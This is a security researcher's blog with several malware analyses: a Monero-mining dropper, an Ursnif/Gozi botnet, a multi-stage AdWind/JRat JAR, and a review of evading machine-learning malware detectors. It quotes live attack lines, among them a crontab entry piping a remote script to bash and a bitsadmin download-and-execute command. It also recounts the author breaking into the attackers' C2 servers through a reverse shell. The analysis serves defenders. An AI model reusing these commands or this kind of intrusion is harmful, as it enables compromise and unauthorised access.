Thursday, September 20, 2018

Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis based on fascinating threat that I like to call Sustes (you will see name genesis in a bit).

Everybody knows Monero crypto currency and probably everybody knows that it has built upon privacy, by meaning It's not that simple to figure out Monero wallet balance. Sustes (mr.sh) is a nice example of Pirate-Mining and even if it's hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it's interesting to fix wallet address in memories and to share IoC for future Protection. So, let's have a closer look to it.

Monero stops you trying to check wallet balance
Sustes Malware doesn't infect victims by itself (it's not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh ) directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the mr.sh content as a today (ref. blog post date).


An initial connection-check wants to take down unwanted software on the victim side (awk '{print $7}' | sed -e "s/\/.*//g") taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker's unwanted communications are the following ones:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check comes from "command lines arguments". Sustes "greps" to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the "grep". The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls "f2" adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. MR.sh follows by running the dropped software with configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom  and private (deployed on private infrastructures) monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

XMRIG prove 1

Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) .... now we have an answer: it's a unwanted Miner. :D.

Hope you had fun


IoC
  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

Friday, August 31, 2018

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs. 

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.

Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.

My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like  de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.

The Stage2 analysis (huge step ahead here)  brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOS versioning harvesting, system manufacturer information and system fingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
C:\Windows\System32\wsqmcons.exe
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"
nslookup  myip.opendns.com resolver1.opendns.com

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:

    • C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
    • C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and  by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.

So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and  to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.

Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.

Reverse Shell On C2 Stage_1

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2  took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts.  Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilĂ , it was possible to checkin in attacker's email :D !

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals ! 

Summary:
In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.

The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.


Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.


IoCs:
Following a list of interesting artefacts that would be helpful to block and prevent the described threat.

Hashes:
  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo Documento1.zip)
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
  • 890808977777@mail.ru
  • willi12s@post.com
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Netwok DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • http://upsvarizones.space/ (C2 level_1)
  • http://romanikustop.space/ (C2 level_1)
  • http://sssloop.host/ (C2 level_1)
  • http://sssloop.space/ (C2 level_1)
  • http://securitytransit.site/ (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.

Monday, August 20, 2018

Interesting hidden threat since years ?

Today I'd like to share the following reverse engineering path since it ended up to be more complex respect what I thought. The full path took me about hours work and the sample covers many obfuscation steps and implementation languages. During the analysis time only really few Antivirus (6 out of 60) were able to "detect" the sample. Actually none really detected it, but some AVs triggered "generic unwanted software" signature, without being able to really figure it out. As usually I am not going to show you who was able to detect it compared to the one who wasn't, since I wont ending on wrong a declarations such as (for example): "Marco said that X is better than Y".  Anyway, having the hash file I believe it would be enough to search for such information.

AntiVirus Coverage


The Sample (SHA256: e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681) presents itself as a JAR file. The first thought that you might have as experienced malware reverse engineer would be: "Ok, another byte code reversing night, easy.. just put focus and debug on it...". BUT surprisingly when you decompile the sample you read the following class !

Stage1: JAR invoking JavaScript
A Java Method that invokes (through evals) an embedded "Javascript" file ! This is totally interesting stuff :D. Let's follow up on stages and see where it goes. The extracted Javascript (stage 2) looks like the following image. The "OOoo00" obfuscation technique have been used. Personally I do not like this obfuscation technique it's harder to reverse respect to different obfuscation techniques, even the CTR-F takes confused on substrings, but we need to figure out what it does, so let's try to manually substitute every string and watch-out for matching substrings (in order words %s/OOoo00/varName/g wont work at all.

Stage 2: evaluated Javacript (obfuscated)
Manually substitution takes "forever" if you do not have a substitution framework which asks you for a string, it replace such string (and not a substring) and eventually represents the new beautified JavaScript. After many substitutions (I really have no idea how many :D) you land on a quite readable JavaScript  as the following one (click on it to make it bigger).

Stage 2: Manually Deobfuscated JavaScript
What is interesting (at least in my personal point of view) is the way the attacker (ab)used the JS-JVM integration. JavaScript takes the Java context by meaning it might use Java functions calling contextual java classes.  In this stage the JavaScript is loading an encrypted content from the original JAR, using a KEY decrypts such a content and finally loads it (Dynamic Class Loader) on memory in order to fire it up as a new Java code. The used encryption algorithm is AES and everything we need to decrypt is in this file, so let's build up a simple python script to print our decryption parameters. The following image shows the decoding script made to easily reconstruct AES-KEY and surrounded parameters. NB: The written python code is not for production, is not protected and full of imprecisions. I made it up just for decode AES key and such, so don't judge it, take it as a known weak but working dirty code.
Python Script to Decode AES-KEY

We now have every decoding parameter, we just need to decrypt the classes by using the following data:
  • ClassName
  • Resource (a.k.a package in where it will be contextualised)
  • Byte to be decrypted
  • Secret Key
  • Byte Length to be decrypted
A Simple Java Decrypter has been developed following the original Malware code. Once run, the following code was decrypted. 

Stage 3 Decrypted JavaClass
Here my favourite point. As you might appreciate from the previous image we are facing a new stage (Stage 3). What is interesting about this new stage is in the way it reflect the old code. It is a defacto replica of the Stage 2. We have new classes to be decrypted (red tag on the image), the same algorithm (orange label on the image), a new KEY (this time is not derived by algorithm as was in Stage 2 but simply in clear text, orange tag on the image) and the same reflective technique in which attacker dynamically loads memory decrypted content on Java.loader and uses it to decrypt again a further step, and after that it replies the code again and again. There is an interesting difference although, this stage builds up a new in memory stage (let's call Stage 4) by adding static GZIpped contents at the end of encrypted section (light blue tag on image). By using that technique the attacker can reach as many decryption stages as he desires. 

At the end of the decryption loop (which took a while, really ) the sample saves (or drops from itself, if you wish) an additional file placed in AppData - Local - Temp named: _ARandomDecimalNumber.class. This .class is actually a JAR file carrying a whole function set. The final stage before ending up runs the following command:

 java -jar _ARandomDecimalNumber.class

The execution of such a command drops on local HardDrive (AppData-Local-Temp) three new files named: RetrieveRandomNumber.vbs (2x) and RandomName.reg. The following image represents a simple 'cat' command on the just dropped files.

On Final Stage VBS Run Files

It's quite funny to see the attacker needed a new language script (he already needed Java, as original entry point, Javascript as payload decrypt and now he is using VBS ! ) to query WMI in order to retrieve installed AntiVirus and Installed Firewall information. Significative the choice to use a .reg file to enumerate tons of security tools that have been widely used by analysts to analyse Malware. The attacker enumerates 571 possible analysis tools that should not be present on the target machine (Victim). Brave, but not neat  at all (on my personal point of view).  The sample does not evade the system but it forces the System Kill of such a process independently if they are installed or not, just like Brute force Killing process. The samples enters in a big loop where it launches 571 sigKill one for each enumerated (.reg) analysis program. It copies through xcopy.exe the entire Java VM into AppData-Roaming-Oracle and by changing local environment classpath uses it to perform the following actions. It finally drops and executes another payload called "plugins".
The following image shows plugins and initial new stage JAR stage.

Final Droppe Files (_RandomDec and plugins)

At a first sight experienced Malware reverser engineer would notice that the original sample finally drops a AdWind/JRat Malware having as a main target to steal files and personal information from victims. While the AdWind/JRat is not interesting per-se since widely analysed,  this new way to deliver AdWind/JRat, it is definitely fascinating me. The attacker mixed up Obfuscation Techniques, Decryption Techniques, File-less abilities, Multi Language Stages and Evasions* Techniques in order to deliver this AdWind/JRat version.  Multiple programming styles have been found during the analysis path. Each Stage belonging with specific programming language is atomic by meaning that could be run separately and each following stage could easily consume its outputs. All these indicators make me believe the original Sample has been built by using Malware builder, which BTW, perfectly fits the AdWind philosophy to run as a service platform. 

A final consideration is about timing. Checking the VirusTotal details (remembering that only 6 on 60 AV were able to say the original JAR was malicious or unwanted) you might notice he following time line.

Detection Time Line (VirusTotal)
VT shows the first time it captured that hash (sha256): it was on 2016. But then the fist submission is on 2018-08-14 few days ago. In such a date (2018-08-14) only 6 out of 60 detected a suspicious (malicious) behaviour and triggered on red state. But what about the almost 2 years between December 2016 and August 2018 ? If we assume the Malware is 2 years old, was it silent until now (until my submission) ? Have we had technology two years ago to detect such a threat ? Or could it be a targeted attack that took almost 2 years before being deployed

I currently have no answers to such a questions, hope you might find some.

*Actually not really an evasion technique, more likely a toolset mitigation.

IoC
You will not find Command and Controls (c2) and dropping url because: (i) dropping url/s was/were not found: the sample auto-extracts contents from itself. (ii) No C2 during the delivery stage. Of course AdWind/JRat does C2 but, as explained, the analyst did not followed on the analysis of AdWind/JRat since well-known malware.
  
hash: 

  • e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681 (Original)
  • 97d585b6aff62fb4e43e7e6a5f816dcd7a14be11a88b109a9ba9e8cd4c456eb9 (_RandomDec..)
  • 9da575dd2d5b7c1e9bab8b51a16cde457b3371c6dcdb0537356cf1497fa868f6 (Retreive1)
  • 45bfe34aa3ef932f75101246eb53d032f5e7cf6d1f5b4e495334955a255f32e7 (Retreive2)
  • 296a0ed2a3575e02ba22e74fd5f8740af4f72b629e4e50643ac0c156694a5f3c (.reg)
  • 32d28c43af1afc977b96436b7f638fba15188e6120eeaefa1ad91fb82015fd80 (plugins)


File Paths:

  • ..AppData/Local/Temp/_ARandomDecimalNumber.class
  • ..AppData/Local/Temp/RetreiveRandomNumber.vbs
  • ..AppData/Local/Temp/RetreiveRandomNumber.vbs
  • ..AppData/Local/Temp/RandomNabe.reg


Tuesday, June 26, 2018

Attacking Machine Learning Detectors: the state of the art review

Machine learning (ML) is a great approach to detect Malware. It is widely used among technical community and scientific community with two different perspectives: Performance V.S Robustness. The technical community tries to improve ML performances in order to increase the usability on large scale while scientific community is focusing on robustness by meaning how easy it would be to attack a ML detector engine. Today I'd like to focus our attention a little bit on the second perspective pointing up how to attack ML detector engines.

We might start by classifying machine learning attacks in three main sets:

  1. Direct Gradient-Based Attack. The attacker needs to know the ML Model. The attacker needs to know model structure and model weights in order to make direct queries to the Machine Learning Model and figure out what is the best way to evade the it.
  2. Score Model Attack. This attack set is based on the score systems. The attacker does not know the Machine Learning Model nor its own weights but he has direct access to the detector engine so that he can probe the machine learning model. The model will return a score and based on such a score, the attacker would be able to guess how to minimise it by forcing specific and crafted inputs.
  3. Binary Black Box Attack.  The attacker has no idea about the Machine Learning Model and the applied Weights, he has also no idea about the scoring system but he have unlimited access to probe the Machine Learning Model. 
Direct Gradient-Based Attack

Direct gradient based attack could be implemented in at least two ways. A first and most used way, is to apply small changes to the original sample in order to reduce the given score. The changes must be limited to a specific domain, for example: valid Windows PE file or  valid PDF files, and so forth. The changes must be little and they should be generated in order to minimise a scoring function derived by weights (which are know fro Direct Gradient-Based Attack). A second way is to connect the targeted model (the mode which is under attack) to a generator model in a generative adversarial network (GAN). Unlike the previous set, the  GAN generator learns how to generate a complete new sample derived by a given seed able to minimise the scoring function. 

I.Goodfellow et Al. in their work "Explaining and Harnessing Adversial Examples" (here) showed how little changes targeted to minimise the resulting weights on a given sample X would be effective in ML evasion. Another great work is written by K.Grosse et Al. titles: "Adversial Perturbations against deep neural networks for malware classification" (here). The authors attacked a deep learning Android malware model, based on DREBIN Android Malware data set, by apply a imperceptible perturbation on the feature vector. They had very interesting results getting from 50% to 84% of evasion rate.   I.Goodfellow et Al. in their work titled "Generative Adversial Nets" (here) developed a GAN able to iterate a series of adversarial rounds to generate samples that were classified as "ham" from the targeted model but that really were not. The following image shows a generative adversarial nets are trained by simultaneously updating the discriminative distribution (D, blue, dashed line) so that it discriminates between samples from the data generating distribution (black,dotted line) px from those of the generative distribution pg (G) (green, solid line).

Image from: "Generative Adversial Nets"



Score Model Attack

The attacker posture on that attack set is considered as "myope". The attacker does not know exactly how the ML model works and he has no idea about how the weights changes inside the ML algorithm but he has the chances to test his sample and getting back a score so that he is able to measure the effect of the input perturbation.

W. Xu, Y. Qi and D. Evans in their work titled: "Automatically evading classifiers" (here) implemented a "fitness function" which gives a fitness score of each generated variant. A variant with a positive fitness score is evasive. The fitness score holds the logic behind the targeted model classified as benign the current sample but retains a malicious behaviour. Once the sample gets high fitness score it is used a seed into a more general genetic algorithm which starts to manipulate the seed in order to make different species. To assure that those mutations preserve the desired malicious behaviour according to the original seed the authors used an oracle. In that case they used cuckoo sandbox.

Image from: "Automatically evading classifiers"


After one week of execution the genetic algorithm found nearly more then 15k evasive variants from 500 circa malicious seeds, getting the 100% of evasion rate on PDFrate classifier.

Binary black-box attacks

